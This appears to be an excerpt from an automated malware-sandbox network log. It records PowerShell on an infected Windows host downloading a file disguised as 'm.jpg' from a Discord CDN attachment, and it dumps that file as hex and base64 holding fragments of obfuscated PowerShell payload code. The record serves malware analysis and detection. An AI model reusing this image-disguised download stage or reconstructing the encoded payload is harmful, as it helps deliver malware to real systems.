Dec 2, 2021 18:28:24.193949938 CET	1951	IN	HTTP/1.1 302 Found Server: nginx Date: Thu, 02 Dec 2021 17:28:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: / Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	162.159.135.233	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 17:26:37 UTC	0	OUT	GET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: cdn.discordapp.com Connection: Keep-Alive
2021-12-02 17:26:37 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 02 Dec 2021 17:26:37 GMT Content-Type: image/jpeg Content-Length: 1920730 Connection: close CF-Ray: 6b7642e54c562b16-FRA Accept-Ranges: bytes Age: 34781 Cache-Control: public, max-age=31536000 ETag: "de726dd453796b237393f7e160eb25e2" Expires: Fri, 02 Dec 2022 17:26:37 GMT Last-Modified: Thu, 02 Dec 2021 02:59:05 GMT CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1638413945526918 x-goog-hash: crc32c=ziGBiQ== x-goog-hash: md5=3nJt1FN5ayNzk/fhYOsl4g== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 1920730 X-GUploader-UploadID: ADPycdtOSUidk_80tzHe3TlG8PYi8QYnojg95PvSsXIJW1mjMpAdWZBGuKmDVfVzmIG0crwn_112m2vXYrH1XJmsMs4 X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AQJ%2BdaFGkk%2BJSHgGzsXo2NZR%2F%2FpxrHCydudUI3eCZni27nZGoVPe8YJjrHnXLzIWmJm%2FtyaEmdoddTPI%2F0ToFquJEMOg4pAodsVOJTbvjdFZoWHZdF9J7uzW0a6qjkAIEL8UBw%3D%3D"}],"group":"cf-nel","max_age":604800}
2021-12-02 17:26:37 UTC	1	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2021-12-02 17:26:37 UTC	1	IN	Data Raw: 56 33 4a 70 64 47 55 74 56 6d 56 79 59 6d 39 7a 5a 53 41 69 52 32 56 30 4c 55 52 6c 59 32 39 74 63 48 4a 6c 63 33 4e 6c 5a 45 4a 35 64 47 56 42 63 6e 4a 68 65 53 49 37 4a 47 45 39 4a 47 45 39 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 6e 65 7a 49 33 4f 44 45 33 4e 6a 46 46 4c 54 49 34 52 54 41 74 4e 44 45 77 4f 53 30 35 4f 55 5a 46 4c 55 49 35 52 44 45 79 4e 30 4d 31 4e 30 46 47 52 58 30 6e 4f 31 64 79 61 58 52 6c 4c 56 5a 6c 63 6d 4a 76 63 32 55 67 49 6b 64 6c 64 43 31 45 5a 57 4e 76 62 58 42 79 5a 58 4e 7a 5a 57 52 43 65 58 52 6c 51 58 4a 79 59 58 6b 69 4f 79 52 68 50 53 52 68 50 56 64 79 61 58 52 6c 4c 55 68 76 63 33 51 67 4a 33 73 79 4e 7a 67 78 4e 7a 59 78 52 53 30 79 4f 45 55 77 4c 54 51 78 4d 44 6b 74 4f 54 6c 47 52 53 31 43 4f 55 51 78 4d 6a 64 Data Ascii: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjd
2021-12-02 17:26:37 UTC	3	IN	Data Raw: 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 49 67 30 4b 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 69 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 Data Ascii: ioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIg0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
2021-12-02 17:26:37 UTC	4	IN	Data Raw: 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 49 67 30 4b 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 69 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b Data Ascii: oqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIg0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqK
2021-12-02 17:26:37 UTC	5	IN	Data Raw: 73 59 44 49 79 4c 47 42 43 52 53 78 67 52 6a 67 73 59 45 45 35 4c 47 41 7a 52 69 78 67 52 54 6b 73 59 45 51 33 4c 47 42 47 4f 43 78 67 51 6a 55 73 59 44 64 47 4c 47 41 34 52 43 78 67 4e 55 59 73 59 45 55 7a 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 63 31 4c 47 42 46 4f 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 45 5a 45 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 44 46 42 4c 47 41 33 52 69 78 67 52 44 63 73 59 45 46 47 4c 47 41 79 4d 53 78 67 51 30 59 73 59 45 56 47 4c 47 42 42 4f 53 78 67 4d 30 59 73 59 44 4d 33 4c 47 41 7a 52 43 78 67 4e 30 59 73 59 44 45 77 4c 47 42 47 52 43 78 67 52 6b 59 73 59 44 4d 33 4c 47 42 47 4f 53 78 67 4e 55 51 73 59 45 5a 46 4c 47 41 35 52 53 78 67 52 45 59 73 59 45 55 30 4c 47 42 45 4e 79 78 67 52 6a Data Ascii: sYDIyLGBCRSxgRjgsYEE5LGAzRixgRTksYEQ3LGBGOCxgQjUsYDdGLGA4RCxgNUYsYEUzLGBENyxgRjgsYDc1LGBFOCxgRkYsYEZGLGBGNyxgRkYsYEZELGA2QixgRkMsYDFBLGA3RixgRDcsYEFGLGAyMSxgQ0YsYEVGLGBBOSxgM0YsYDM3LGAzRCxgN0YsYDEwLGBGRCxgRkYsYDM3LGBGOSxgNUQsYEZFLGA5RSxgREYsYEU0LGBENyxgRj
2021-12-02 17:26:37 UTC	7	IN	Data Raw: 4e 53 78 67 52 54 67 73 59 44 64 47 4c 47 41 32 4d 43 78 67 4e 44 63 73 59 45 4e 43 4c 47 42 44 52 69 78 67 52 55 59 73 59 44 51 35 4c 47 42 47 52 69 78 67 4d 55 49 73 59 45 51 33 4c 47 41 33 4f 53 78 67 4e 54 6b 73 59 44 55 78 4c 47 41 30 4d 79 78 67 51 7a 59 73 59 44 4d 31 4c 47 41 31 4e 53 78 67 4d 55 45 73 59 45 5a 44 4c 47 41 78 4e 79 78 67 51 6b 51 73 59 44 63 32 4c 47 41 30 52 69 78 67 4f 44 49 73 59 44 42 47 4c 47 42 46 4f 43 78 67 4e 54 6b 73 59 45 5a 45 4c 47 42 46 52 69 78 67 52 44 49 73 59 45 55 32 4c 47 42 45 51 69 78 67 51 6b 59 73 59 44 41 32 4c 47 41 31 52 53 78 67 52 6a 6b 73 59 44 63 31 4c 47 41 33 52 69 78 67 4f 45 51 73 59 44 5a 47 4c 47 42 47 52 69 78 67 4d 30 55 73 59 45 4a 47 4c 47 42 47 4e 69 78 67 51 55 59 73 59 45 59 78 4c 47 42 Data Ascii: NSxgRTgsYDdGLGA2MCxgNDcsYENCLGBDRixgRUYsYDQ5LGBGRixgMUIsYEQ3LGA3OSxgNTksYDUxLGA0MyxgQzYsYDM1LGA1NSxgMUEsYEZDLGAxNyxgQkQsYDc2LGA0RixgODIsYDBGLGBFOCxgNTksYEZELGBFRixgRDIsYEU2LGBEQixgQkYsYDA2LGA1RSxgRjksYDc1LGA3RixgOEQsYDZGLGBGRixgM0UsYEJGLGBGNixgQUYsYEYxLGB
2021-12-02 17:26:37 UTC	8	IN	Data Raw: 45 49 31 4c 47 42 47 4f 53 78 67 4d 6a 4d 73 59 44 41 35 4c 47 41 31 52 53 78 67 4e 45 55 73 59 44 55 30 4c 47 41 35 4f 53 78 67 4e 54 41 73 59 44 64 47 4c 47 42 47 52 69 78 67 4d 6a 49 73 59 45 49 31 4c 47 42 47 52 69 78 67 4e 7a 63 73 59 45 55 35 4c 47 42 47 4e 79 78 67 4e 55 59 73 59 44 6c 43 4c 47 42 43 52 53 78 67 52 6b 49 73 59 44 5a 47 4c 47 42 46 4f 43 78 67 52 6a 4d 73 59 44 64 47 4c 47 41 35 4d 43 78 67 4e 6a 41 73 59 45 4a 45 4c 47 41 77 4d 53 78 67 4e 6b 51 73 59 45 55 34 4c 47 42 45 52 43 78 67 52 54 59 73 59 44 4d 33 4c 47 42 47 4f 43 78 67 4d 7a 55 73 59 44 64 46 4c 47 41 34 52 43 78 67 52 6b 59 73 59 44 6c 45 4c 47 42 47 52 53 78 67 52 6b 59 73 59 44 67 32 4c 47 41 7a 52 53 78 67 52 6b 49 73 59 45 59 7a 4c 47 42 42 4f 43 78 67 51 30 51 73 Data Ascii: EI1LGBGOSxgMjMsYDA5LGA1RSxgNEUsYDU0LGA5OSxgNTAsYDdGLGBGRixgMjIsYEI1LGBGRixgNzcsYEU5LGBGNyxgNUYsYDlCLGBCRSxgRkIsYDZGLGBFOCxgRjMsYDdGLGA5MCxgNjAsYEJELGAwMSxgNkQsYEU4LGBERCxgRTYsYDM3LGBGOCxgMzUsYDdFLGA4RCxgRkYsYDlELGBGRSxgRkYsYDg2LGAzRSxgRkIsYEYzLGBBOCxgQ0Qs
2021-12-02 17:26:37 UTC	9	IN	Data Raw: 78 67 4e 54 59 73 59 44 56 43 4c 47 41 7a 52 69 78 67 4f 45 55 73 59 45 52 47 4c 47 41 7a 52 69 78 67 4d 6a 4d 73 59 44 55 34 4c 47 41 34 52 69 78 67 4e 30 59 73 59 45 56 42 4c 47 41 7a 4e 79 78 67 52 6b 59 73 59 44 4a 44 4c 47 41 7a 51 69 78 67 52 6a 67 73 59 45 49 31 4c 47 42 45 4d 43 78 67 52 54 55 73 59 44 6c 47 4c 47 42 47 4d 69 78 67 52 44 63 73 59 45 5a 47 4c 47 42 45 4e 43 78 67 51 6b 59 73 59 44 6c 46 4c 47 42 47 52 53 78 67 51 6a 55 73 59 44 64 47 4c 47 42 44 4e 43 78 67 4f 55 59 73 59 45 59 32 4c 47 41 30 4e 79 78 67 52 6a 6b 73 59 44 56 45 4c 47 42 47 52 53 78 67 4e 54 59 73 59 45 4a 47 4c 47 41 30 4d 53 78 67 52 6b 45 73 59 45 56 43 4c 47 42 47 51 79 78 67 4e 55 55 73 59 45 5a 47 4c 47 42 47 4f 43 78 67 52 55 59 73 59 45 59 77 4c 47 42 47 51 Data Ascii: xgNTYsYDVCLGAzRixgOEUsYERGLGAzRixgMjMsYDU4LGA4RixgN0YsYEVBLGAzNyxgRkYsYDJDLGAzQixgRjgsYEI1LGBEMCxgRTUsYDlGLGBGMixgRDcsYEZGLGBENCxgQkYsYDlFLGBGRSxgQjUsYDdGLGBDNCxgOUYsYEY2LGA0NyxgRjksYDVELGBGRSxgNTYsYEJGLGA0MSxgRkEsYEVCLGBGQyxgNUUsYEZGLGBGOCxgRUYsYEYwLGBGQ
2021-12-02 17:26:37 UTC	11	IN	Data Raw: 47 4c 47 42 46 51 79 78 67 52 6b 55 73 59 44 4d 32 4c 47 42 43 52 69 78 67 52 54 55 73 59 45 46 47 4c 47 41 30 4e 79 78 67 52 55 59 73 59 45 56 44 4c 47 42 47 52 53 78 67 4e 54 51 73 59 45 5a 45 4c 47 41 30 52 69 78 67 4e 7a 63 73 59 45 52 46 4c 47 42 47 4f 53 78 67 4d 54 4d 73 59 45 59 77 4c 47 42 44 52 53 78 67 52 6b 59 73 59 45 59 79 4c 47 42 47 51 53 78 67 4d 55 59 73 59 45 59 34 4c 47 42 46 4e 79 78 67 52 44 4d 73 59 44 64 47 4c 47 42 47 52 43 78 67 52 44 63 73 59 45 59 35 4c 47 42 47 51 69 78 67 52 6b 59 73 59 44 63 79 4c 47 42 47 52 69 78 67 4f 55 51 73 59 45 56 45 4c 47 42 45 52 69 78 67 4d 6a 41 73 59 45 5a 45 4c 47 41 31 4e 53 78 67 51 30 49 73 59 45 51 35 4c 47 41 32 52 69 78 67 51 30 55 73 59 45 5a 44 4c 47 42 43 4d 53 78 67 52 6b 51 73 59 44 Data Ascii: GLGBFQyxgRkUsYDM2LGBCRixgRTUsYEFGLGA0NyxgRUYsYEVDLGBGRSxgNTQsYEZELGA0RixgNzcsYERFLGBGOSxgMTMsYEYwLGBDRSxgRkYsYEYyLGBGQSxgMUYsYEY4LGBFNyxgRDMsYDdGLGBGRCxgRDcsYEY5LGBGQixgRkYsYDcyLGBGRixgOUQsYEVELGBERixgMjAsYEZELGA1NSxgQ0IsYEQ5LGA2RixgQ0UsYEZDLGBCMSxgRkQsYD
2021-12-02 17:26:37 UTC	12	IN	Data Raw: 4e 55 55 73 59 44 4e 43 4c 47 42 47 4f 53 78 67 51 54 6b 73 59 45 52 47 4c 47 42 47 51 79 78 67 4d 6a 6b 73 59 44 68 45 4c 47 41 78 52 69 78 67 51 6a 41 73 59 45 5a 47 4c 47 42 42 51 53 78 67 4e 30 59 73 59 45 59 77 4c 47 42 45 4f 53 78 67 52 6a 4d 73 59 45 59 30 4c 47 42 47 4d 79 78 67 4d 30 59 73 59 45 56 43 4c 47 41 35 52 69 78 67 4d 45 4d 73 59 45 45 32 4c 47 41 32 4e 79 78 67 52 54 63 73 59 44 4d 33 4c 47 42 47 52 69 78 67 4e 7a 55 73 59 44 64 47 4c 47 42 45 51 69 78 67 52 45 59 73 59 45 5a 43 4c 47 42 43 4e 79 78 67 52 6b 4d 73 59 44 63 31 4c 47 42 42 4f 53 78 67 52 54 55 73 59 45 4e 46 4c 47 41 30 52 69 78 67 52 44 55 73 59 44 64 47 4c 47 41 32 4d 53 78 67 51 54 63 73 59 44 67 7a 4c 47 42 47 52 69 78 67 52 55 55 73 59 44 64 47 4c 47 42 42 4e 79 78 Data Ascii: NUUsYDNCLGBGOSxgQTksYERGLGBGQyxgMjksYDhELGAxRixgQjAsYEZGLGBBQSxgN0YsYEYwLGBEOSxgRjMsYEY0LGBGMyxgM0YsYEVCLGA5RixgMEMsYEE2LGA2NyxgRTcsYDM3LGBGRixgNzUsYDdGLGBEQixgREYsYEZCLGBCNyxgRkMsYDc1LGBBOSxgRTUsYENFLGA0RixgRDUsYDdGLGA2MSxgQTcsYDgzLGBGRixgRUUsYDdGLGBBNyx
2021-12-02 17:26:37 UTC	13	IN	Data Raw: 47 41 32 52 53 78 67 52 55 49 73 59 45 4a 47 4c 47 42 47 52 53 78 67 52 6a 45 73 59 44 5a 47 4c 47 41 35 4d 43 78 67 52 6b 55 73 59 44 5a 45 4c 47 42 43 52 69 78 67 51 30 59 73 59 44 64 47 4c 47 41 35 4e 53 78 67 4d 7a 4d 73 59 45 51 33 4c 47 41 33 52 53 78 67 52 6b 4d 73 59 44 55 7a 4c 47 42 47 4e 53 78 67 52 55 59 73 59 45 52 46 4c 47 41 33 4f 53 78 67 52 6a 45 73 59 44 4a 47 4c 47 42 47 51 79 78 67 4e 54 55 73 59 45 51 77 4c 47 41 31 4d 43 78 67 52 6b 59 73 59 45 59 7a 4c 47 41 7a 52 69 78 67 51 6a 51 73 59 44 64 43 4c 47 42 45 4e 79 78 67 52 54 4d 73 59 45 45 78 4c 47 41 7a 52 69 78 67 4d 44 59 73 59 45 51 77 4c 47 41 34 51 53 78 67 4e 55 59 73 59 45 59 77 4c 47 41 35 51 69 78 67 52 6b 55 73 59 45 46 45 4c 47 42 46 4f 53 78 67 4d 55 59 73 59 45 5a 42 Data Ascii: GA2RSxgRUIsYEJGLGBGRSxgRjEsYDZGLGA5MCxgRkUsYDZELGBCRixgQ0YsYDdGLGA5NSxgMzMsYEQ3LGA3RSxgRkMsYDUzLGBGNSxgRUYsYERFLGA3OSxgRjEsYDJGLGBGQyxgNTUsYEQwLGA1MCxgRkYsYEYzLGAzRixgQjQsYDdCLGBENyxgRTMsYEExLGAzRixgMDYsYEQwLGA4QSxgNUYsYEYwLGA5QixgRkUsYEFELGBFOSxgMUYsYEZB
2021-12-02 17:26:37 UTC	15	IN	Data Raw: 51 73 59 45 5a 45 4c 47 42 45 52 69 78 67 52 54 41 73 59 45 59 33 4c 47 41 77 4e 69 78 67 51 54 6b 73 59 44 64 46 4c 47 41 34 51 69 78 67 4f 55 59 73 59 45 46 42 4c 47 42 47 52 69 78 67 52 6a 49 73 59 45 4e 46 4c 47 41 34 51 69 78 67 51 6b 59 73 59 44 45 77 4c 47 41 79 52 69 78 67 4d 30 55 73 59 44 4a 42 4c 47 41 33 52 53 78 67 51 55 51 73 59 44 64 47 4c 47 41 79 4f 43 78 67 52 6b 51 73 59 44 52 45 4c 47 41 77 52 53 78 67 51 6b 55 73 59 45 59 7a 4c 47 42 42 51 69 78 67 52 6b 4d 73 59 44 45 33 4c 47 41 33 52 69 78 67 4e 45 59 73 59 44 41 34 4c 47 42 45 4e 69 78 67 52 55 59 73 59 45 59 35 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 45 52 47 4c 47 42 45 51 69 78 67 4e 7a 6b 73 59 45 55 7a 4c 47 41 35 4e 79 78 67 52 6b 59 73 59 44 52 42 4c 47 41 33 51 53 78 67 52 Data Ascii: QsYEZELGBERixgRTAsYEY3LGAwNixgQTksYDdFLGA4QixgOUYsYEFBLGBGRixgRjIsYENFLGA4QixgQkYsYDEwLGAyRixgM0UsYDJBLGA3RSxgQUQsYDdGLGAyOCxgRkQsYDRELGAwRSxgQkUsYEYzLGBBQixgRkMsYDE3LGA3RixgNEYsYDA4LGBENixgRUYsYEY5LGA1MyxgRjUsYERGLGBEQixgNzksYEUzLGA5NyxgRkYsYDRBLGA3QSxgR
2021-12-02 17:26:37 UTC	16	IN	Data Raw: 33 52 69 78 67 4f 44 59 73 59 45 4a 46 4c 47 41 30 51 69 78 67 52 6b 59 73 59 45 49 7a 4c 47 42 43 52 43 78 67 4d 30 59 73 59 45 59 33 4c 47 42 46 52 69 78 67 4e 45 45 73 59 45 56 47 4c 47 42 47 52 53 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 46 4d 43 78 67 4e 30 59 73 59 45 56 44 4c 47 41 34 4d 79 78 67 52 6b 4d 73 59 45 52 45 4c 47 41 33 52 69 78 67 4f 44 4d 73 59 44 56 47 4c 47 41 35 52 69 78 67 4e 7a 6b 73 59 45 59 33 4c 47 41 33 4e 79 78 67 52 6b 59 73 59 45 45 35 4c 47 42 47 51 53 78 67 52 6a 63 73 59 45 55 34 4c 47 41 77 4d 43 78 67 52 6b 4d 73 59 45 51 7a 4c 47 42 46 4f 53 78 67 4d 6a 55 73 59 44 45 79 4c 47 42 43 4e 53 78 67 52 6a 51 73 59 45 45 33 4c 47 41 33 52 69 78 67 52 6a 41 73 59 44 51 33 4c 47 41 7a 52 53 78 67 52 6b 4d 73 59 45 4a 47 4c 47 Data Ascii: 3RixgODYsYEJFLGA0QixgRkYsYEIzLGBCRCxgM0YsYEY3LGBFRixgNEEsYEVGLGBGRSxgRkQsYEZGLGBFMCxgN0YsYEVDLGA4MyxgRkMsYERELGA3RixgODMsYDVGLGA5RixgNzksYEY3LGA3NyxgRkYsYEE5LGBGQSxgRjcsYEU4LGAwMCxgRkMsYEQzLGBFOSxgMjUsYDEyLGBCNSxgRjQsYEE3LGA3RixgRjAsYDQ3LGAzRSxgRkMsYEJGLG
2021-12-02 17:26:37 UTC	17	IN	Data Raw: 59 44 64 47 4c 47 41 33 52 53 78 67 52 6b 45 73 59 44 4d 33 4c 47 42 47 52 43 78 67 4e 44 6b 73 59 44 64 47 4c 47 42 47 4e 79 78 67 4d 30 59 73 59 45 55 33 4c 47 42 43 52 69 78 67 52 6a 51 73 59 44 46 43 4c 47 42 47 52 69 78 67 4d 7a 59 73 59 44 45 34 4c 47 42 46 51 53 78 67 4e 6b 59 73 59 45 5a 44 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 44 4e 47 4c 47 42 45 52 53 78 67 4e 7a 6b 73 59 45 55 31 4c 47 41 78 4e 79 78 67 52 54 41 73 59 44 6b 31 4c 47 42 43 52 69 78 67 52 54 4d 73 59 45 4e 47 4c 47 42 47 52 69 78 67 4d 44 63 73 59 44 64 47 4c 47 42 47 4e 79 78 67 52 6a 51 73 59 44 4d 33 4c 47 42 47 4f 53 78 67 4e 30 49 73 59 45 52 43 4c 47 41 7a 52 69 78 67 51 30 4d 73 59 44 64 47 4c 47 42 46 4e 53 78 67 4e 7a 63 73 59 45 59 35 4c 47 42 47 4e 53 78 67 52 44 4d Data Ascii: YDdGLGA3RSxgRkEsYDM3LGBGRCxgNDksYDdGLGBGNyxgM0YsYEU3LGBCRixgRjQsYDFCLGBGRixgMzYsYDE4LGBFQSxgNkYsYEZDLGA1MyxgRjUsYDNGLGBERSxgNzksYEU1LGAxNyxgRTAsYDk1LGBCRixgRTMsYENGLGBGRixgMDcsYDdGLGBGNyxgRjQsYDM3LGBGOSxgN0IsYERCLGAzRixgQ0MsYDdGLGBFNSxgNzcsYEY5LGBGNSxgRDM
2021-12-02 17:26:37 UTC	19	IN	Data Raw: 43 78 67 52 54 41 73 59 45 59 78 4c 47 42 42 4e 79 78 67 52 44 49 73 59 44 68 43 4c 47 42 47 4e 53 78 67 52 45 59 73 59 44 46 43 4c 47 41 33 51 79 78 67 52 6a 67 73 59 44 56 43 4c 47 42 47 52 53 78 67 51 54 59 73 59 45 55 35 4c 47 42 45 52 53 78 67 4d 55 59 73 59 45 5a 43 4c 47 41 77 4e 79 78 67 4d 54 59 73 59 44 49 79 4c 47 42 43 4d 79 78 67 51 6b 59 73 59 44 45 35 4c 47 42 43 52 43 78 67 52 6a 59 73 59 44 6c 43 4c 47 42 47 52 53 78 67 52 44 51 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4f 55 49 73 59 44 59 31 4c 47 41 77 4e 79 78 67 51 7a 55 73 59 44 4a 47 4c 47 41 31 4d 79 78 67 4f 45 4d 73 59 45 55 33 4c 47 41 35 52 69 78 67 4e 30 59 73 59 45 59 33 4c 47 41 7a 52 53 78 67 4d 7a 41 73 59 45 5a 46 4c 47 42 43 52 69 78 67 4d 55 59 73 59 45 5a 45 4c 47 42 45 Data Ascii: CxgRTAsYEYxLGBBNyxgRDIsYDhCLGBGNSxgREYsYDFCLGA3QyxgRjgsYDVCLGBGRSxgQTYsYEU5LGBERSxgMUYsYEZCLGAwNyxgMTYsYDIyLGBCMyxgQkYsYDE5LGBCRCxgRjYsYDlCLGBGRSxgRDQsYDZGLGBGRSxgOUIsYDY1LGAwNyxgQzUsYDJGLGA1MyxgOEMsYEU3LGA5RixgN0YsYEY3LGAzRSxgMzAsYEZFLGBCRixgMUYsYEZELGBE
2021-12-02 17:26:37 UTC	20	IN	Data Raw: 59 30 4c 47 42 45 4f 53 78 67 4d 30 51 73 59 44 4d 77 4c 47 42 46 51 69 78 67 4e 6b 59 73 59 45 5a 45 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 45 5a 47 4c 47 41 78 4f 43 78 67 4e 7a 51 73 59 44 6b 79 4c 47 41 78 52 43 78 67 52 6b 4d 73 59 45 4d 31 4c 47 41 33 4f 43 78 67 52 6a 55 73 59 45 59 7a 4c 47 42 45 52 69 78 67 52 6a 67 73 59 45 5a 47 4c 47 42 47 51 53 78 67 51 6b 51 73 59 45 51 79 4c 47 41 33 52 69 78 67 52 6a 45 73 59 44 45 33 4c 47 42 47 52 69 78 67 4e 6a 45 73 59 44 68 45 4c 47 42 47 52 69 78 67 52 55 45 73 59 45 56 47 4c 47 41 35 4d 43 78 67 51 6b 55 73 59 45 5a 42 4c 47 42 44 52 43 78 67 52 6b 59 73 59 45 4e 42 4c 47 41 33 52 69 78 67 4d 55 49 73 59 45 45 79 4c 47 42 47 4e 79 78 67 4d 30 49 73 59 45 5a 44 4c 47 41 31 4e 43 78 67 52 6b 51 73 59 Data Ascii: Y0LGBEOSxgM0QsYDMwLGBFQixgNkYsYEZELGA1MyxgRjUsYEZGLGAxOCxgNzQsYDkyLGAxRCxgRkMsYEM1LGA3OCxgRjUsYEYzLGBERixgRjgsYEZGLGBGQSxgQkQsYEQyLGA3RixgRjEsYDE3LGBGRixgNjEsYDhELGBGRixgRUEsYEVGLGA5MCxgQkUsYEZBLGBDRCxgRkYsYENBLGA3RixgMUIsYEEyLGBGNyxgM0IsYEZDLGA1NCxgRkQsY
2021-12-02 17:26:37 UTC	21	IN	Data Raw: 67 52 45 59 73 59 45 59 33 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 4d 31 4c 47 41 33 52 53 78 67 4f 45 59 73 59 45 52 47 4c 47 41 35 4d 69 78 67 52 45 45 73 59 45 4e 46 4c 47 41 33 52 53 78 67 4f 45 51 73 59 44 56 47 4c 47 42 46 4d 79 78 67 4f 55 59 73 59 44 49 77 4c 47 41 31 4f 43 78 67 4f 45 59 73 59 44 64 47 4c 47 42 45 4e 79 78 67 4e 55 59 73 59 45 55 7a 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 56 43 4c 47 41 77 4f 43 78 67 52 55 55 73 59 45 51 35 4c 47 42 44 4e 53 78 67 51 55 59 73 59 45 59 78 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 44 6b 79 4c 47 41 79 4f 53 78 67 52 6b 51 73 59 44 6c 47 4c 47 42 45 52 53 78 67 52 45 51 73 59 45 45 33 4c 47 42 46 52 69 78 67 4e 30 55 73 59 44 5a 45 4c 47 42 47 51 53 78 67 52 6a 6b 73 59 44 63 33 4c 47 42 46 52 43 Data Ascii: 